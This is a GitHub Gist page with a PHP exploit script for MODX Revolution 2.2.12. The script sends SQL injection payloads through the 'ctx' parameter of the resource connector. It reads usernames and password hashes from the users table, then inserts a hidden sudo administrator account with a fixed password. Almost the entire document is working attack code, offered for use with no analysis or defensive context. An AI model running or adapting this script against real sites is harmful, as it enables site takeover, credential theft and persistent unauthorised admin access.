Last active
August 29, 2015 14:18
-
-
Save vgrish/d160443da268f2b5e3d2 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?php | |
class SqlInjection{ | |
const UID = 'GaGaGa'; | |
static public $CONNECTOR_PATH = '/connectors/'; | |
static public $TABLE_PREFIX = 'modx_'; | |
static protected $goodRequest = null; | |
static protected function sqlBad(){ | |
$userTable = self::getTableName('users'); | |
return 'UNION+SELECT+id,username,password+FROM+'.$userTable.'+WHERE+id+IN(99999);'; | |
} | |
static protected function sqlGood(){ | |
$userTable = self::getTableName('users'); | |
return 'UNION+SELECT+id,username,password+FROM+'.$userTable.'+WHERE+id+IN(1);'; | |
} | |
static public function curl($url, $data = '', array $header = array()){ | |
$ch = curl_init(); | |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); | |
curl_setopt($ch, CURLOPT_VERBOSE, false); | |
curl_setopt($ch, CURLOPT_POST, true); | |
curl_setopt($ch, CURLOPT_POSTFIELDS, $data); | |
if(!empty($header)){ | |
curl_setopt($ch, CURLOPT_HTTPHEADER, $header); | |
} | |
curl_setopt($ch, CURLOPT_TIMEOUT, 10); | |
curl_setopt($ch, CURLOPT_URL, $url); | |
return curl_exec($ch); | |
} | |
public static function validate($host){ | |
self::$goodRequest = null; | |
$outBad = self::curl(self::makePath($host), self::makeUrl(self::sqlBad())); | |
$outGood = self::curl(self::makePath($host), self::makeUrl(self::sqlGood())); | |
$out = ( $outGood != $outBad ); | |
if($out){ | |
self::$goodRequest = $outGood; | |
} | |
return $out; | |
} | |
public static function getTableName($table){ | |
return self::$TABLE_PREFIX . $table; | |
} | |
public static function makeUrl($sql){ | |
$sql = rtrim($sql, ';'); | |
return str_replace('=','%3D', 'ctx[rank`+IN+(666)+'.$sql.';/*]'). '=' . self::UID; | |
} | |
public static function makePath($host, $connector = 'resource/index.php'){ | |
return $host . self::$CONNECTOR_PATH . $connector; | |
} | |
public static function makeHost($host){ | |
$data = parse_url($host); | |
$out = self::getParam('host', $data, self::getParam('path', $data)); | |
if(!empty($out)){ | |
$out = 'http://' . $out; | |
} | |
return $out; | |
} | |
public static function br(){ | |
self::showLog(); | |
} | |
public static function showLog($msg='', $br = false){ | |
print $msg."\n"; | |
if($br){ | |
self::br(); | |
} | |
} | |
public static function createUser($host, $username){ | |
$userTable = self::getTableName('users'); | |
$attributesTable = self::getTableName('user_attributes'); | |
$sql = 'INSERT+INTO+'.$userTable.'(`username`,`password`,`active`,`salt`,`primary_group`,`sudo`)+VALUES(\''.$username.'\',\'K/kCexN2TCvP4/L9w7i%2BIlzKfRVbH9MlhE4hXmD88Mw=\', 1, \'dd257bbc31dbe5c3518c95b592f5bfca\', 1, 1);'; | |
self::curl(self::makePath($host), self::makeUrl(self::sqlBad().$sql)); | |
$sql = 'INSERT+INTO+'.$attributesTable.'+(`email`,`blocked`)+VALUES+(\'fuckyoumodxrevolutionagain2@asdasd.ru\', 0)'; | |
self::curl(self::makePath($host), self::makeUrl(self::sqlBad().$sql)); | |
$sql = 'UPDATE+'.$attributesTable.'+SET+`internalKey`+=+(SELECT+`id`+FROM+'.$userTable.'+WHERE+`username`=\''.$username.'\'+LIMIT+1)+WHERE+`internalKey`+=+0'; | |
self::curl(self::makePath($host), self::makeUrl(self::sqlBad().$sql)); | |
$sql = 'UNION+SELECT+id,username,password+FROM+'.$userTable.'+WHERE+username+IN(\''.$username.'\')'; | |
$lastRequest = self::curl(self::makePath($host), self::makeUrl(self::sqlGood().$sql)); | |
return ( !empty(self::$goodRequest) && self::$goodRequest == $lastRequest ); | |
} | |
public static function getParam($key, array $data = array(), $default = null){ | |
return array_key_exists($key, $data) ? $data[$key] : $default; | |
} | |
} | |
if(php_sapi_name() === 'cli'){ | |
SqlInjection::showLog('Use command line'); | |
exit; | |
} | |
SqlInjection::showLog('/****************************************/'); | |
SqlInjection::showLog('/* Exploit for MODX Revolution 2.2.12 */'); | |
SqlInjection::showLog('/* Author: Agel_Nash */'); | |
SqlInjection::showLog('/* Date: 05.03.2014 */'); | |
SqlInjection::showLog('/****************************************/', true); | |
SqlInjection::showLog('Example: php '.basename(__FILE__).' host [connector_path] [table_prefix] [username]', true); | |
SqlInjection::br(); | |
if( !isset($argv) || !is_array($argv) || count($argv)<2 ){ | |
SqlInjection::showLog('Example: php revo2212.php example.com /connector/ modx_ test'); | |
exit; | |
} | |
$host = SqlInjection::makeHost(SqlInjection::getParam(1, $argv, '')); | |
SqlInjection::$CONNECTOR_PATH = SqlInjection::getParam(2, $argv, SqlInjection::$CONNECTOR_PATH); | |
SqlInjection::$TABLE_PREFIX = SqlInjection::getParam(3, $argv, SqlInjection::$TABLE_PREFIX); | |
$userName = SqlInjection::getParam(4, $argv, SqlInjection::UID); | |
if( empty($host) && SqlInjection::validate($host) ){ | |
SqlInjection::showLog('Good validate'); | |
SqlInjection::showLog('Create sudo user "'.$userName.'" with password 123123123...'); | |
if(SqlInjection::createUser($host, $userName)){ | |
SqlInjection::showLog('Done'); | |
}else{ | |
SqlInjection::showLog('Error'); | |
} | |
}else{ | |
SqlInjection::showLog('Fail'); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment